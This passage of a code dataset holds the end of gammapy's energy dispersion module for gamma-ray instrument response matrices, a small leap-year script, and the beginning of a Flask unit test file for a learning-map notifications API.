It's not clear which would be more efficient\n for typical gamma-ray energy dispersion matrices.\n\n The most common file format for energy dispersion matrices is the RMF\n (Redistribution Matrix File) format from X-ray astronomy:\n http://heasarc.gsfc.nasa.gov/docs/heasarc/caldb/docs/summary/cal_gen_92_002_summary.html\n\n Parameters\n ----------\n data : array_like\n 2-dim energy dispersion matrix (probability density).\n e_true : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of true energy axis\n e_reco : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of reconstruced energy axis\n \"\"\"\n e_true = BinnedDataAxis(interpolation_mode='log')\n \"\"\"True energy axis\"\"\"\n e_reco = BinnedDataAxis(interpolation_mode='log')\n \"\"\"Reconstructed energy axis\"\"\"\n axis_names = ['e_true', 'e_reco']\n \"\"\"Axis names (in order)\"\"\"\n interp_kwargs = dict(bounds_error=False, fill_value=0)\n \"\"\"Interpolation kwargs\"\"\"\n\n @property\n def pdf_matrix(self):\n \"\"\"PDF matrix `~numpy.ndarray`\n\n Rows (first index): True Energy\n Columns (second index): Reco Energy\n \"\"\"\n return self.data\n\n def pdf_in_safe_range(self, lo_threshold, hi_threshold):\n \"\"\"PDF matrix with bins outside threshold set to 0\n \n Parameters\n ----------\n lo_threshold : `~astropy.units.Quantity`\n Low reco energy threshold\n hi_threshold : `~astropy.units.Quantity`\n High reco energy threshold\n \"\"\"\n data = self.data.copy()\n idx = np.where((self.e_reco.data[:-1] < lo_threshold) |\n (self.e_reco.data[1:] > hi_threshold))\n data[:,idx] = 0\n return data\n\n @classmethod\n def from_gauss(cls, e_true, e_reco, sigma=0.2, pdf_threshold=1e-6):\n \"\"\"Create Gaussian `EnergyDispersion` matrix.\n\n The output matrix will be Gaussian in log(e_true / e_reco)\n\n TODO: extend to have a vector of bias various true energies.\n TODO: extend to have vector of resolution for various true energies.\n TODO: give formula: Gaussian in log(e_reco)\n TODO: add option to add poisson noise\n\n Parameters\n ----------\n e_true : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of true energy axis\n e_reco : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of reconstructed energy axis\n sigma : float, optional\n RMS width of Gaussian energy dispersion, resolution\n pdf_threshold : float, optional\n Zero suppression threshold\n \"\"\"\n from scipy.special import erf\n\n # Init array without data\n retval = cls(e_true=e_true, e_reco=e_reco)\n\n # erf does not work with Quantities\n reco = retval.e_reco.data.to('TeV').value\n true = retval.e_true.nodes.to('TeV').value\n migra_min = np.log10(reco[:-1] / true[:, np.newaxis])\n migra_max = np.log10(reco[1:] / true[:, np.newaxis])\n\n pdf = .5 * (erf(migra_max / (np.sqrt(2.) * sigma))\n - erf(migra_min / (np.sqrt(2.) 
* sigma)))\n\n pdf[np.where(pdf < pdf_threshold)] = 0\n retval.data = pdf\n\n return retval\n\n @classmethod\n def from_hdulist(cls, hdu_list):\n \"\"\"Create `EnergyDispersion` object from `~astropy.io.fits.HDUList`.\n\n Parameters\n ----------\n hdu_list : `~astropy.io.fits.HDUList`\n HDU list with ``MATRIX`` and ``EBOUNDS`` extensions.\n \"\"\"\n data = hdu_list['MATRIX'].data\n header = hdu_list['MATRIX'].header\n\n pdf_matrix = np.zeros([len(data), header['DETCHANS']], dtype=np.float64)\n\n for i, l in enumerate(data):\n if l.field('N_GRP'):\n m_start = 0\n for k in range(l.field('N_GRP')):\n pdf_matrix[i, l.field('F_CHAN')[k]: l.field(\n 'F_CHAN')[k] + l.field('N_CHAN')[k]] = l.field(\n 'MATRIX')[m_start:m_start + l.field('N_CHAN')[k]]\n m_start += l.field('N_CHAN')[k]\n\n e_reco = EnergyBounds.from_ebounds(hdu_list['EBOUNDS'])\n e_true = EnergyBounds.from_rmf_matrix(hdu_list['MATRIX'])\n\n return cls(data=pdf_matrix, e_true=e_true, e_reco=e_reco)\n\n def to_hdulist(self, **kwargs):\n \"\"\"\n Convert RM to FITS HDU list format.\n\n Parameters\n ----------\n header : `~astropy.io.fits.Header`\n Header to be written in the fits file.\n energy_unit : str\n Unit in which the energy is written in the HDU list\n\n Returns\n -------\n hdulist : `~astropy.io.fits.HDUList`\n RMF in HDU list format.\n\n Notes\n -----\n For more info on the RMF FITS file format see:\n http://heasarc.gsfc.nasa.gov/docs/heasarc/caldb/docs/summary/cal_gen_92_002_summary.html\n\n \"\"\"\n # Cannot use table_to_fits here due to variable length array\n # http://docs.astropy.org/en/v1.0.4/io/fits/usage/unfamiliar.html\n\n table = self.to_table()\n name = table.meta.pop('name')\n\n header = fits.Header()\n header.update(table.meta)\n\n cols = table.columns\n c0 = fits.Column(name=cols[0].name, format='E', array=cols[0],\n unit='{}'.format(cols[0].unit))\n c1 = fits.Column(name=cols[1].name, format='E', array=cols[1],\n unit='{}'.format(cols[1].unit))\n c2 = fits.Column(name=cols[2].name, format='I', array=cols[2])\n c3 = fits.Column(name=cols[3].name, format='PI()', array=cols[3])\n c4 = fits.Column(name=cols[4].name, format='PI()', array=cols[4])\n c5 = fits.Column(name=cols[5].name, format='PE()', array=cols[5])\n\n hdu = fits.BinTableHDU.from_columns([c0, c1, c2, c3, c4, c5],\n header=header, name=name)\n\n ebounds = energy_axis_to_ebounds(self.e_reco)\n prim_hdu = fits.PrimaryHDU()\n\n return fits.HDUList([prim_hdu, hdu, ebounds])\n\n def to_table(self):\n \"\"\"Convert to `~astropy.table.Table`.\n\n The output table is in the OGIP RMF format.\n http://heasarc.gsfc.nasa.gov/docs/heasarc/caldb/docs/memos/cal_gen_92_002/cal_gen_92_002.html#Tab:1\n \"\"\"\n table = Table()\n\n rows = self.pdf_matrix.shape[0]\n n_grp = []\n f_chan = np.ndarray(dtype=np.object, shape=rows)\n n_chan = np.ndarray(dtype=np.object, shape=rows)\n matrix = np.ndarray(dtype=np.object, shape=rows)\n\n # Make RMF type matrix\n for i, row in enumerate(self.data.value):\n subsets = 1\n pos = np.nonzero(row)[0]\n borders = np.where(np.diff(pos) != 1)[0]\n # add 1 to borders for correct behaviour of np.split\n groups = np.asarray(np.split(pos, borders + 1))\n n_grp_temp = groups.shape[0] if groups.size > 0 else 1\n n_chan_temp = np.asarray([val.size for val in groups])\n try:\n f_chan_temp = np.asarray([val[0] for val in groups])\n except(IndexError):\n f_chan_temp = np.zeros(1)\n\n n_grp.append(n_grp_temp)\n f_chan[i] = f_chan_temp\n n_chan[i] = n_chan_temp\n matrix[i] = row[pos]\n\n table['ENERG_LO'] = self.e_true.data[:-1]\n table['ENERG_HI'] = 
self.e_true.data[1:]\n        table['N_GRP'] = np.asarray(n_grp, dtype=np.int16)\n        table['F_CHAN'] = f_chan\n        table['N_CHAN'] = n_chan\n        table['MATRIX'] = matrix\n\n        # Get total number of groups and channel subsets\n        numgrp, numelt = 0, 0\n        for val, val2 in zip(table['N_GRP'], table['N_CHAN']):\n            numgrp += np.sum(val)\n            numelt += np.sum(val2)\n\n        meta = dict(name='MATRIX',\n                    chantype='PHA',\n                    hduclass='OGIP',\n                    hduclas1='RESPONSE',\n                    hduclas2='RSP_MATRIX',\n                    detchans=self.e_reco.nbins,\n                    numgrp=numgrp,\n                    numelt=numelt,\n                    tlmin4=0,\n                    )\n\n        table.meta = meta\n        return table\n\n    def get_resolution(self, e_true):\n        \"\"\"Get energy resolution for a given true energy\n        \n        Resolution is the 1 sigma containment of the energy dispersion PDF.\n\n        Parameters\n        ----------\n        e_true : `~astropy.units.Quantity`\n            True energy\n        \"\"\"\n        # Variance is 2nd moment of PDF\n        pdf = self.evaluate(e_true=e_true)\n        mean = self._get_mean(e_true)\n        temp = (self.e_reco._interp_nodes() - mean) ** 2\n        var = np.sum(temp * pdf)\n        return np.sqrt(var)\n\n    def get_bias(self, e_true):\n        r\"\"\"Get reconstruction bias for a given true energy\n        \n        Bias is defined as\n\n        .. math::\n\n            \\frac{E_{true}-E_{reco}}{E_{true}}\n\n        Parameters\n        ----------\n        e_true : `~astropy.units.Quantity`\n            True energy\n        \"\"\"\n        mean = self._get_mean(e_true)\n        e_reco = (10 ** mean) * self.e_reco.unit\n        bias = (e_true - e_reco) / e_true\n        return bias\n\n    def _get_mean(self, e_true):\n        r\"\"\"Get mean log reconstructed energy\n        \"\"\"\n        # Reconstructed energy is 1st moment of PDF\n        pdf = self.evaluate(e_true=e_true)\n        norm = np.sum(pdf)\n        temp = np.sum(pdf * self.e_reco._interp_nodes())\n        return temp / norm\n\n    def apply(self, data, e_reco=None):\n        \"\"\"Apply energy dispersion.\n\n        Computes the matrix product of ``data``\n        (which typically is model flux or counts in true energy bins)\n        with the energy dispersion matrix.\n\n        Parameters\n        ----------\n        data : array_like\n            1-dim data array.\n        e_reco : `~astropy.units.Quantity`, optional\n            Desired energy binning of the convolved data, if provided the\n            `~gammapy.irf.EnergyDispersion` is evaluated at the log centers of\n            the energy axis.\n\n        Returns\n        -------\n        convolved_data : array\n            1-dim data array after multiplication with the energy dispersion matrix\n        \"\"\"\n        if e_reco is None:\n            e_reco = self.e_reco.nodes\n        else:\n            e_reco = np.sqrt(e_reco[:-1] * e_reco[1:])\n        edisp_pdf = self.evaluate(e_reco=e_reco)\n        return np.dot(data, edisp_pdf)\n\n    def _extent(self):\n        \"\"\"Extent (x0, x1, y0, y1) for plotting (4x float)\n\n        x stands for true energy and y for reconstructed energy\n        \"\"\"\n        x = self.e_true.data[[0, -1]].value\n        y = self.e_reco.data[[0, -1]].value\n        return x[0], x[1], y[0], y[1]\n\n    def plot_matrix(self, ax=None, show_energy=None, **kwargs):\n        \"\"\"Plot PDF matrix.\n        \n        Parameters\n        ----------\n        ax : `~matplotlib.axes.Axes`, optional\n            Axis \n        show_energy : `~astropy.units.Quantity`, optional\n            Show energy, e.g. 
threshold, as vertical line\n\n        Returns\n        -------\n        ax : `~matplotlib.axes.Axes`\n            Axis\n        \"\"\"\n        import matplotlib.pyplot as plt\n        from matplotlib.colors import PowerNorm\n\n        kwargs.setdefault('cmap', 'afmhot')\n        kwargs.setdefault('origin', 'bottom')\n        kwargs.setdefault('interpolation', 'nearest')\n        kwargs.setdefault('norm', PowerNorm(gamma=0.5))\n\n        ax = plt.gca() if ax is None else ax\n\n        image = self.pdf_matrix.transpose()\n        ax.imshow(image, extent=self._extent(), **kwargs)\n        if show_energy is not None:\n            ener_val = Quantity(show_energy).to(self.e_reco.unit).value\n            ax.hlines(ener_val, 0, 200200, linestyles='dashed')\n\n        ax.set_xlabel('True energy (TeV)')\n        ax.set_ylabel('Reco energy (TeV)')\n\n        ax.set_xscale('log')\n        ax.set_yscale('log')\n\n        return ax\n\n    def plot_bias(self, ax=None, **kwargs):\n        \"\"\"Plot reconstruction bias.\n        \n        see :func:`~gammapy.irf.EnergyDispersion.get_bias`\n\n        Parameters\n        ----------\n        ax : `~matplotlib.axes.Axes`, optional\n            Axis \n        \"\"\"\n        import matplotlib.pyplot as plt\n\n        ax = plt.gca() if ax is None else ax\n\n        x = self.e_true.nodes.to('TeV').value\n        y = self.get_bias(self.e_true.nodes)\n\n        ax.plot(x, y, **kwargs)\n        ax.set_xlabel('True energy [TeV]')\n        ax.set_ylabel(r'(E_{true} - E_{reco}) / E_{true}')\n        ax.set_xscale('log')\n        return ax\n\n    def to_sherpa(self, name):\n        \"\"\"Return `~sherpa.astro.data.DataRMF`\n        \n        Parameters\n        ----------\n        name : str\n            Instance name\n        \"\"\"\n        from sherpa.astro.data import DataRMF\n        from sherpa.utils import SherpaInt, SherpaUInt, SherpaFloat\n\n        # Need to modify RMF data \n        # see https://github.com/sherpa/sherpa/blob/master/sherpa/astro/io/pyfits_backend.py#L727\n\n        table = self.to_table()\n        n_grp = table['N_GRP'].data.astype(SherpaUInt)\n        f_chan = table['F_CHAN'].data\n        f_chan = np.concatenate([row for row in f_chan]).astype(SherpaUInt)\n        n_chan = table['N_CHAN'].data\n        n_chan = np.concatenate([row for row in n_chan]).astype(SherpaUInt)\n        matrix = table['MATRIX'].data\n\n        good = n_grp > 0\n        matrix = matrix[good]\n        matrix = np.concatenate([row for row in matrix])\n        matrix = matrix.astype(SherpaFloat)\n\n        # TODO: Not sure if we need this if statement\n        if f_chan.ndim > 1 and n_chan.ndim > 1:\n            f_chan = []\n            n_chan = []\n            for grp, fch, nch in zip(n_grp, f_chan, n_chan):\n                for i in range(grp):\n                    f_chan.append(fch[i])\n                    n_chan.append(nch[i])\n\n            f_chan = np.asarray(f_chan, SherpaUInt)\n            n_chan = np.asarray(n_chan, SherpaUInt)\n        else:\n            if len(n_grp) == len(f_chan):\n                good = n_grp > 0\n                f_chan = f_chan[good]\n                n_chan = n_chan[good]\n\n        kwargs = dict(\n            name = name,\n            energ_lo = table['ENERG_LO'].quantity.to('keV').value.astype(SherpaFloat),\n            energ_hi = table['ENERG_HI'].quantity.to('keV').value.astype(SherpaFloat),\n            matrix = matrix,\n            n_grp = n_grp,\n            n_chan = n_chan,\n            f_chan = f_chan,\n            detchans= self.e_reco.nbins,\n            e_min = self.e_reco.data[:-1].to('keV').value,\n            e_max = self.e_reco.data[1:].to('keV').value,\n            offset=0,\n        )\n\n        return DataRMF(**kwargs)\n\n\nclass EnergyDispersion2D(object):\n    \"\"\"Offset-dependent energy dispersion matrix.\n\n    Parameters\n    ----------\n    etrue_lo : `~gammapy.utils.energy.Energy`\n        True energy lower bounds\n    etrue_hi : `~gammapy.utils.energy.Energy`\n        True energy upper bounds\n    migra_lo : `~numpy.ndarray`, list\n        Migration lower bounds\n    migra_hi : `~numpy.ndarray`, list\n        Migration upper bounds\n    offset_lo : `~astropy.coordinates.Angle`\n        Offset lower bounds\n    offset_hi : `~astropy.coordinates.Angle`\n        Offset upper bounds\n    dispersion : `~numpy.ndarray`\n        PDF matrix\n    
interp_kwargs : dict or None\n Interpolation parameter dict passed to `scipy.interpolate.RegularGridInterpolator`.\n If you pass ``None``, the default ``interp_params=dict(bounds_error=False, fill_value=0)`` is used.\n\n Examples\n --------\n\n Plot migration histogram for a given offset and true energy\n\n .. plot::\n :include-source:\n\n import matplotlib.pyplot as plt\n from gammapy.irf import EnergyDispersion2D\n filename = '$GAMMAPY_EXTRA/test_datasets/irf/hess/pa/hess_edisp_2d_023523.fits.gz'\n edisp = EnergyDispersion2D.read(filename, hdu='ENERGY DISPERSION')\n edisp.plot_migration()\n plt.xlim(0, 4)\n\n\n Plot evolution of bias and resolution as a function of true energy\n for a given offset\n\n .. plot::\n :include-source:\n\n import matplotlib.pyplot as plt\n import numpy as np\n from gammapy.irf import EnergyDispersion2D\n from gammapy.utils.energy import Energy\n from astropy.coordinates import Angle\n filename = '$GAMMAPY_EXTRA/test_datasets/irf/hess/pa/hess_edisp_2d_023523.fits.gz'\n edisp = EnergyDispersion2D.read(filename, hdu='ENERGY DISPERSION')\n migra = np.linspace(0.1,2,80)\n e_true = Energy.equal_log_spacing(0.13,60,60,'TeV')\n offset = Angle([0.554], 'deg')\n edisp.plot_bias(offset=offset, e_true=e_true, migra=migra)\n plt.xscale('log')\n\n Create RMF matrix\n\n .. plot::\n :include-source:\n\n import matplotlib.pyplot as plt\n from gammapy.irf import EnergyDispersion2D\n from gammapy.utils.energy import EnergyBounds\n filename = '$GAMMAPY_EXTRA/test_datasets/irf/hess/pa/hess_edisp_2d_023523.fits.gz'\n edisp = EnergyDispersion2D.read(filename, hdu='ENERGY DISPERSION')\n e_axis = EnergyBounds.equal_log_spacing(0.1,20,60, 'TeV')\n rmf = edisp.to_energy_dispersion('1.2 deg', e_reco = e_axis, e_true = e_axis)\n rmf.plot_matrix()\n plt.loglog()\n\n \"\"\"\n\n def __init__(self, etrue_lo, etrue_hi, migra_lo, migra_hi, offset_lo,\n offset_hi, dispersion, interp_kwargs=None):\n\n if not isinstance(etrue_lo, Quantity) or not isinstance(etrue_hi, Quantity):\n raise ValueError(\"Energies must be Quantity objects.\")\n if not isinstance(offset_lo, Angle) or not isinstance(offset_hi, Angle):\n raise ValueError(\"Offsets must be Angle objects.\")\n\n self.migra_lo = migra_lo\n self.migra_hi = migra_hi\n self.offset_lo = offset_lo\n self.offset_hi = offset_hi\n self.dispersion = dispersion\n\n self.ebounds = EnergyBounds.from_lower_and_upper_bounds(etrue_lo, etrue_hi)\n self.energy = self.ebounds.log_centers\n self.offset = (offset_hi + offset_lo) / 2\n self.migra = (migra_hi + migra_lo) / 2\n\n if not interp_kwargs:\n interp_kwargs = dict(bounds_error=False, fill_value=0)\n\n self._prepare_linear_interpolator(interp_kwargs)\n\n @classmethod\n def from_fits(cls, hdu):\n \"\"\"Create from a FITS HDU.\n\n Parameters\n ----------\n hdu : `~astropy.io.fits.BinTableHDU`\n ``ENERGY DISPERSION`` extension.\n\n \"\"\"\n data = hdu.data\n header = hdu.header\n e_lo = EnergyBounds(data['ETRUE_LO'].squeeze(), header['TUNIT1'])\n e_hi = EnergyBounds(data['ETRUE_HI'].squeeze(), header['TUNIT2'])\n o_lo = Angle(data['THETA_LO'].squeeze(), header['TUNIT5'])\n o_hi = Angle(data['THETA_HI'].squeeze(), header['TUNIT6'])\n m_lo = data['MIGRA_LO'].squeeze()\n m_hi = data['MIGRA_HI'].squeeze()\n matrix = data['MATRIX'].squeeze()\n\n return cls(e_lo, e_hi, m_lo, m_hi, o_lo, o_hi, matrix)\n\n @classmethod\n def read(cls, filename, hdu='edisp_2d'):\n \"\"\"Read from FITS file.\n\n See :ref:`gadf:edisp_2d`\n\n Parameters\n ----------\n filename : str\n File name\n \"\"\"\n filename = make_path(filename)\n 
hdulist = fits.open(str(filename))\n hdu = hdulist[hdu]\n return cls.from_fits(hdu)\n\n def evaluate(self, offset=None, e_true=None, migra=None):\n \"\"\"Probability for a given offset, true energy, and migration\n\n Parameters\n ----------\n e_true : `~gammapy.utils.energy.Energy`, optional\n True energy\n migra : `~numpy.ndarray`, optional\n Energy migration e_reco/e_true\n offset : `~astropy.coordinates.Angle`, optional\n Offset\n \"\"\"\n\n offset = self.offset if offset is None else Angle(offset)\n e_true = self.energy if e_true is None else Energy(e_true)\n migra = self.migra if migra is None else migra\n\n offset = offset.to('deg')\n e_true = e_true.to('TeV')\n\n val = self._eval(offset=offset, e_true=e_true, migra=migra)\n\n return val\n\n def _eval(self, offset=None, e_true=None, migra=None):\n\n x = np.atleast_1d(offset.value)\n y = np.atleast_1d(migra)\n z = np.atleast_1d(np.log10(e_true.value))\n in_shape = (x.size, y.size, z.size)\n\n pts = [[xx, yy, zz] for xx in x for yy in y for zz in z]\n val_array = self._linear(pts)\n\n return val_array.reshape(in_shape).squeeze()\n\n def to_energy_dispersion(self, offset, e_true=None, e_reco=None):\n \"\"\"Detector response R(Delta E_reco, Delta E_true)\n\n Probability to reconstruct an energy in a given true energy band\n in a given reconstructed energy band\n\n Parameters\n ----------\n offset : `~astropy.coordinates.Angle`\n Offset\n e_true : `~gammapy.utils.energy.EnergyBounds`, None\n True energy axis\n e_reco : `~gammapy.utils.energy.EnergyBounds`\n Reconstructed energy axis\n\n Returns\n -------\n edisp : `~gammapy.irf.EnergyDispersion`\n Energy disperion matrix\n \"\"\"\n offset = Angle(offset)\n e_true = self.ebounds if e_true is None else EnergyBounds(e_true)\n e_reco = self.ebounds if e_reco is None else EnergyBounds(e_reco)\n\n rm = []\n\n for energy in e_true.log_centers:\n vec = self.get_response(offset=offset, e_true=energy, e_reco=e_reco)\n rm.append(vec)\n\n rm = np.asarray(rm)\n return EnergyDispersion(data=rm, e_true=e_true, e_reco=e_reco)\n\n def get_response(self, offset, e_true, e_reco=None):\n \"\"\"Detector response R(Delta E_reco, E_true)\n\n Probability to reconstruct a given true energy in a given reconstructed\n energy band. 
The `~gammapy.irf.EnergyDispersion2D` is evaluated at the\n reco energy bin centers and the result is multiplied with the bin\n width.\n\n Parameters\n ----------\n e_true : `~gammapy.utils.energy.Energy`\n True energy\n e_reco : `~gammapy.utils.energy.EnergyBounds`, None\n Reconstructed energy axis\n offset : `~astropy.coordinates.Angle`\n Offset\n\n Returns\n -------\n rv : `~numpy.ndarray`\n Redistribution vector\n \"\"\"\n\n e_true = Energy(e_true)\n\n # Default: e_reco nodes = migra nodes * e_true nodes\n if e_reco is None:\n e_reco = EnergyBounds.from_lower_and_upper_bounds(\n self.migra_lo * e_true, self.migra_hi * e_true)\n migra = self.migra\n\n # Translate given e_reco binning to migra at bin center\n else:\n e_reco = EnergyBounds(e_reco)\n center = e_reco.log_centers\n migra = center / e_true\n\n val = self.evaluate(offset=offset, e_true=e_true, migra=migra)\n\n # Multiply by migra bin width (~Integration)\n rv = val * (e_reco.bands / e_true)\n\n return rv.value\n\n def plot_migration(self, ax=None, offset=None, e_true=None,\n migra=None, **kwargs):\n \"\"\"Plot energy dispersion for given offset and true energy.\n\n Parameters\n ----------\n ax : `~matplotlib.axes.Axes`, optional\n Axis\n offset : `~astropy.coordinates.Angle`, optional\n Offset\n e_true : `~gammapy.utils.energy.Energy`, optional\n True energy\n migra : `~numpy.array`, list, optional\n Migration nodes\n\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axis\n \"\"\"\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n if offset is None:\n offset = Angle([1], 'deg')\n else:\n offset = np.atleast_1d(Angle(offset))\n if e_true is None:\n e_true = Energy([0.1, 1, 10], 'TeV')\n else:\n e_true = np.atleast_1d(Energy(e_true))\n migra = self.migra if migra is None else migra\n\n for ener in e_true:\n for off in offset:\n disp = self.evaluate(offset=off, e_true=ener, migra=migra)\n label = 'offset = {0:.1f}\\nenergy = {1:.1f}'.format(off, ener)\n ax.plot(migra, disp, label=label, **kwargs)\n\n ax.set_xlabel('E_Reco / E_True')\n ax.set_ylabel('Probability density')\n ax.legend(loc='upper left')\n\n return ax\n\n def plot_bias(self, ax=None, offset=None, e_true=None,\n migra=None, **kwargs):\n \"\"\"Plot migration as a function of true energy for a given offset\n\n Parameters\n ----------\n ax : `~matplotlib.axes.Axes`, optional\n Axis\n offset : `~astropy.coordinates.Angle`, optional\n Offset\n e_true : `~gammapy.utils.energy.Energy`, optional\n True energy\n migra : `~numpy.array`, list, optional\n Migration nodes\n\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axis\n \"\"\"\n from matplotlib.colors import PowerNorm\n import matplotlib.pyplot as plt\n\n kwargs.setdefault('cmap', 'afmhot')\n kwargs.setdefault('norm', PowerNorm(gamma=0.5))\n\n ax = plt.gca() if ax is None else ax\n\n if offset is None:\n offset = Angle([1], 'deg')\n if e_true is None:\n e_true = self.energy\n if migra is None:\n migra = self.migra\n\n z = self.evaluate(offset=offset, e_true=e_true, migra=migra)\n x = e_true.value\n y = migra\n\n ax.pcolor(x, y, z, **kwargs)\n ax.semilogx()\n ax.set_xlabel('Energy (TeV)')\n ax.set_ylabel('E_Reco / E_true')\n\n return ax\n\n def peek(self, figsize=(15, 5)):\n \"\"\"Quick-look summary plots.\n\n Parameters\n ----------\n figsize : (float, float)\n Size of the resulting plot\n \"\"\"\n import matplotlib.pyplot as plt\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=figsize)\n self.plot_bias(ax=axes[0])\n self.plot_migration(ax=axes[1])\n edisp = 
self.to_energy_dispersion(offset='1 deg')\n edisp.plot_matrix(ax=axes[2])\n\n plt.tight_layout()\n plt.show()\n return fig\n\n def _prepare_linear_interpolator(self, interp_kwargs):\n from scipy.interpolate import RegularGridInterpolator\n\n x = self.offset\n y = self.migra\n z = np.log10(self.energy.value)\n points = (x, y, z)\n values = self.dispersion\n\n self._linear = RegularGridInterpolator(points, values, **interp_kwargs)\n\n def info(self):\n \"\"\"Print some basic info.\n \"\"\"\n ss = \"\\nSummary EnergyDispersion2D info\\n\"\n ss += \"--------------------------------\\n\"\n # Summarise data members\n ss += array_stats_str(self.energy, 'energy')\n ss += array_stats_str(self.offset, 'offset')\n ss += array_stats_str(self.migra, 'migra')\n ss += array_stats_str(self.dispersion, 'dispersion')\n\n energy = Energy('1 TeV')\n e_reco = EnergyBounds([0.8, 1.2], 'TeV')\n offset = Angle('0.5 deg')\n p = self.get_response(offset, energy, e_reco)[0]\n\n ss += 'Probability to reconstruct a {} photon in the range {} at {}' \\\n ' offset: {:.2f}'.format(energy, e_reco, offset, p)\n\n return ss\n","sub_path":"gammapy/irf/energy_dispersion.py","file_name":"energy_dispersion.py","file_ext":"py","file_size_in_byte":28444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"512650392","text":"'''John Nguyen 998808398'''\n'''This program will check if a year is a leap year or not'''\n\nyear = int(input('Please enter a year: '))\n\nif year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\n print('%d is a leap year.' % (year))\nelse:\n\tprint('%d is not a leap year.' % (year))\n\n\n\n\t","sub_path":"isleapyear.py","file_name":"isleapyear.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191664022","text":"import datetime\nimport json\nimport flask_sse\n\n\nfrom unittest import mock\nfrom unittest.mock import patch\nfrom flask_sse import sse\n\n\nfrom learning_map_api.api.models import (db, Contribution, Notification, User,\n ContributionType, Path, Level)\nfrom learning_map_api.test.base import BaseTestCase, generate_token\n\n\nclass NotificationsTestCase(BaseTestCase):\n\n exp_date = datetime.datetime.utcnow()\n regular_payload = {\n 'UserInfo': {\n 'id': '-KJKcv0D',\n 'email': 'test.test@andela.com',\n 'first_name': 'test',\n 'last_name': 'test',\n 'name': 'test test',\n 'picture': 'https://lh6.googleusercontent.com/-1DhBLOJentg'\n '/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50',\n 'roles': {\n 'Andelan': '-Ktestandelanid',\n 'Fellow': '-Ktestfellowid'\n }\n },\n 'exp': exp_date + datetime.timedelta(days=1)\n }\n regular_header = {\n \"Authorization\": generate_token(regular_payload, 'secret')\n }\n\n\n\n def setUp(self):\n db.drop_all()\n db.create_all()\n self.admin_user = User(\n id=\"-Ktestasminid\",\n email=\"testadmin.test@andela.com\",\n name=\"admin admin\",\n roles={\n \"Andelan\": \"-Ktestandelanid\",\n \"Fellow\": \"-Ktestfellowid\",\n \"LMAP_ADMIN\": \"-Ktestadminid\"\n },\n image_url='https://lh6.googleusercontent.com/-1DhBLOJentg'\n '/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50')\n self.admin_user.save()\n admin_payload = {\n 'UserInfo': {\n 'id': '-Ktestasminid',\n 'email': 'test.testAdmin@andela.com',\n 'first_name': 'testAdmin',\n 'last_name': 'testAdmin',\n 'name': 'test Admin',\n 'picture': 'https://lh6.googleusercontent.com/-1DhBLOJentg'\n '/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50',\n 'roles': {\n 
'Andelan': '-Ktestandelanid',\n 'Fellow': '-Ktestfellowid',\n 'LMAP_ADMIN': '-Ktestasminid'\n }},\n 'exp': NotificationsTestCase.exp_date + datetime.timedelta(days=1)}\n\n self.admin_header = {\n \"Authorization\": generate_token(admin_payload, 'secret')}\n\n self.path = Path(name=\"JS developer\", description=\"JS developer for d1\"\n )\n self.path.save()\n self.d0 = Level(name=\"d0\")\n self.d0.save()\n self.resource = ContributionType(name=\"resource\")\n self.resource.save()\n\n self.contribution = Contribution(\n id=\"-KA4Q0D45T7\",\n description=\"http://www.python.com\",\n title=\"Data Science\",\n user_id=\"-KJKcv0D\",\n contribution_type=self.resource,\n contribution_type_id=self.resource.id,\n level_id=self.d0.id,\n path_id=self.path.id)\n\n self.contribution.save()\n self.regular_user = User(\n id=\"-KJKcv0D\",\n email=\"test.test@andela.com\",\n name=\"test test\",\n roles={\n 'Andelan': '-Ktestandelanid',\n 'Fellow': '-Ktestfellowid'\n },\n image_url=\"https://lh6.googleusercontent.com/-1DhBLOJentg\"\n \"/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50\"\n )\n self.regular_user.save()\n self.notification1 = Notification.create(\n \"New contribution was created\",\n \"contribution\",\n self.contribution.id,\n self.regular_user.id,\n userId='-ktestuser',\n userName=\"random fellow\",\n userImg=\"random.jpeg\"\n )\n self.notification1.save()\n self.notification2 = Notification.create(\n \"New contribution was created\",\n \"contribution\",\n self.contribution.id,\n self.regular_user.id,\n userId='-ktestuser',\n userName=\"random fellow\",\n userImg=\"random.jpeg\"\n )\n self.notification2.save()\n self.notification3 = Notification.create(\n \"New contribution was created\",\n \"contribution\",\n self.contribution.id,\n self.regular_user.id,\n userId='-ktestuser',\n userName=\"random fellow\",\n userImg=\"random.jpeg\"\n )\n self.notification3.read = 1\n self.notification3.save()\n\n def test_request_does_not_contain_headers(self):\n response = self.client.get('/api/v1/notifications')\n response_data = json.loads(response.data)\n self.assert400(response)\n self.assertEqual(response_data['data']['message'],\n 'Bad request. 
Header does not contain authorization'\n ' token')\n\n def test_fetch_all_notifications(self):\n '''\n Test that a user can see all contribution notifications\n '''\n response = self.client.get('/api/v1/notifications', headers=self.regular_header)\n notifs_number = Notification.query_redis(self.regular_user.id)\n response_data = json.loads(response.data)\n self.assertEqual(len(response_data['data']['notifications']), len(notifs_number))\n \n self.assert200(response)\n\n def test_user_get_single_notification(self):\n '''\n Test that a user can get a single notification\n '''\n\n response = self.client.get(\n 'api/v1/notifications/{}'.format(self.notification1.id),\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200),\n self.assertTrue('recipientId' in generated_response['data'])\n self.assertTrue('id' in generated_response['data'])\n self.assertTrue('message' in generated_response['data'])\n self.assertTrue('category' in generated_response['data'])\n\n def test_no_existing_notification(self):\n '''\n Test a user gets a 404 when trying to 